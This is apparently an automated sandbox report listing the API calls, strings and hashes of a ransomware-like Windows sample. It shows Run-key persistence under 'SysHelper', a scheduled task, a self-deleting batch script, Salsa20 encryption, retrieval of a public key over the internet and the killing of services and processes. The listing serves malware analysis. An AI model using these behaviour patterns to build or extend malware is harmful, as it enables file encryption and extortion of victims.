                                • _malloc.LIBCMT ref: 0040E6CD
                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                • _sprintf.LIBCMT ref: 0040E720
                                • _wprintf.LIBCMT ref: 0040E732
                                • _wprintf.LIBCMT ref: 0040E73C
                                • _free.LIBCMT ref: 0040E745
                                Strings
                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                • Address: %s, mac: %s, xrefs: 0040E72D
                                Similarity
                                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                APIs
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                • _memmove.LIBCMT ref: 00410427
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                • _memmove.LIBCMT ref: 00410514
                                Similarity
                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                • String ID:
                                APIs
                                Similarity
                                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                • String ID:
                                APIs
                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                Strings
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                APIs
                                Strings
                                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                • input != nullptr && output != nullptr, xrefs: 0040C095
                                Similarity
                                • API ID: __wassert
                                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                APIs
                                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                • GetLastError.KERNEL32 ref: 00412509
                                • CloseHandle.KERNEL32 ref: 0041251C
                                • CloseHandle.KERNEL32 ref: 00412539
                                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                • GetLastError.KERNEL32 ref: 0041255B
                                • CloseHandle.KERNEL32 ref: 0041256E
                                Strings
                                Similarity
                                • API ID: CloseHandle$CreateErrorLastMutex
                                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                APIs
                                Strings
                                Similarity
                                • API ID: _strncmp
                                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                APIs
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                • String ID:
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                • _malloc.LIBCMT ref: 0041BBE4
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                • _free.LIBCMT ref: 0041BCD7
                                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                • IsWindow.USER32(?), ref: 0041BF69
                                • DestroyWindow.USER32(?), ref: 0041BF7B
                                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                Similarity
                                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                • String ID:
                                APIs
                                • DecodePointer.KERNEL32 ref: 00427B29
                                • _free.LIBCMT ref: 00427B42
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • _free.LIBCMT ref: 00427B55
                                • _free.LIBCMT ref: 00427B73
                                • _free.LIBCMT ref: 00427B85
                                • _free.LIBCMT ref: 00427B96
                                • _free.LIBCMT ref: 00427BA1
                                • _free.LIBCMT ref: 00427BC5
                                • EncodePointer.KERNEL32(00674FD8), ref: 00427BCC
                                • _free.LIBCMT ref: 00427BE1
                                • _free.LIBCMT ref: 00427BF7
                                • _free.LIBCMT ref: 00427C1F
                                Similarity
                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                • String ID:
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00411BB0
                                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                • CoUninitialize.OLE32 ref: 00411BD0
                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                • lstrcatW.KERNEL32(?), ref: 00411C44
                                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                Strings
                                Similarity
                                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                • String ID: \shell32.dll
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                • GetDesktopWindow.USER32 ref: 004549FB
                                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                • _wcsstr.LIBCMT ref: 00454A8A
                                Strings
                                Similarity
                                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                • String ID: Service-0x$_OPENSSL_isservice
                                APIs
                                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                • __vfwprintf_p.LIBCMT ref: 00454B27
                                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                • vswprintf.LIBCMT ref: 00454B5D
                                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                Strings
                                Similarity
                                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                • String ID: OPENSSL$OpenSSL: FATAL
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                • _memset.LIBCMT ref: 004123B6
                                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                • GetCommandLineW.KERNEL32 ref: 004123F4
                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                • SysHelper, xrefs: 004123D6
                                Similarity
                                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                APIs
                                Strings
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                • _memset.LIBCMT ref: 0040DC38
                                • CoUninitialize.OLE32 ref: 0040DC92
                                Strings
                                Similarity
                                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                • String ID: --Task$Comment$Time Trigger Task
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                • Sleep.KERNEL32(?), ref: 00411A75
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                Strings
                                Similarity
                                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                • String ID: MYSQL
                                APIs
                                • std::exception::exception.LIBCMT ref: 0044F27F
                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                • __CxxThrowException@8.LIBCMT ref: 0044F294
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • std::exception::exception.LIBCMT ref: 0044F2AD
                                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                • std::exception::exception.LIBCMT ref: 0044F2FB
                                • __CxxThrowException@8.LIBCMT ref: 0044F310
                                Strings
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                • String ID: bad function call
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                Strings
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                APIs
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                • String ID:
                                APIs
                                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                • _fgetws.LIBCMT ref: 0040C7BC
                                • _memmove.LIBCMT ref: 0040C89F
                                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                Strings
                                Similarity
                                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID: cmd.exe
                                • API String ID: 2696918072-723907552
                                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                APIs
                                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: SHGetFolderPathW$Shell32.dll$\
                                • API String ID: 2574300362-2555811374
                                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID: &#160;$Error encrypting message: %s$\\n
                                • API String ID: 1783060780-3771355929
                                • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strncmp
                                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                • API String ID: 909875538-2908105608
                                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseValue$OpenQuery
                                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                • API String ID: 3962714758-1667468722
                                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                APIs
                                • _memset.LIBCMT ref: 0041E707
                                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                • InternetOpenW.WININET ref: 0041E743
                                • _wcsstr.LIBCMT ref: 0041E7AE
                                • _memmove.LIBCMT ref: 0041E838
                                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                • _strstr.LIBCMT ref: 0041EA36
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                • _malloc.LIBCMT ref: 0041EB86
                                • _memset.LIBCMT ref: 0041EB94
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                • _strstr.LIBCMT ref: 0041EBDA
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                • String ID: bowsakkdestx.txt${"public_key":"
                                • API String ID: 2805819797-1771568745
                                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                • API String ID: 1302938615-3129329331
                                • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                APIs
                                • ___unDName.LIBCMT ref: 0043071B
                                • _strlen.LIBCMT ref: 0043072E
                                • __lock.LIBCMT ref: 0043074A
                                • _malloc.LIBCMT ref: 0043075C
                                • _malloc.LIBCMT ref: 0043076D
                                • _free.LIBCMT ref: 004307B6
                                  • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                • _free.LIBCMT ref: 004307AF
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                • String ID:
                                • API String ID: 3704956918-0
                                • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                APIs
                                • timeGetTime.WINMM ref: 00411B1E
                                • timeGetTime.WINMM ref: 00411B29
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                • DispatchMessageW.USER32(?), ref: 00411B5C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                • Sleep.KERNEL32(00000064), ref: 00411B72
                                • timeGetTime.WINMM ref: 00411B78
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageTimetime$Peek$DispatchSleep
                                • String ID:
                                • API String ID: 3697694649-0
                                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                APIs
                                • __init_pointers.LIBCMT ref: 00425141
                                  • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                  • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                  • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
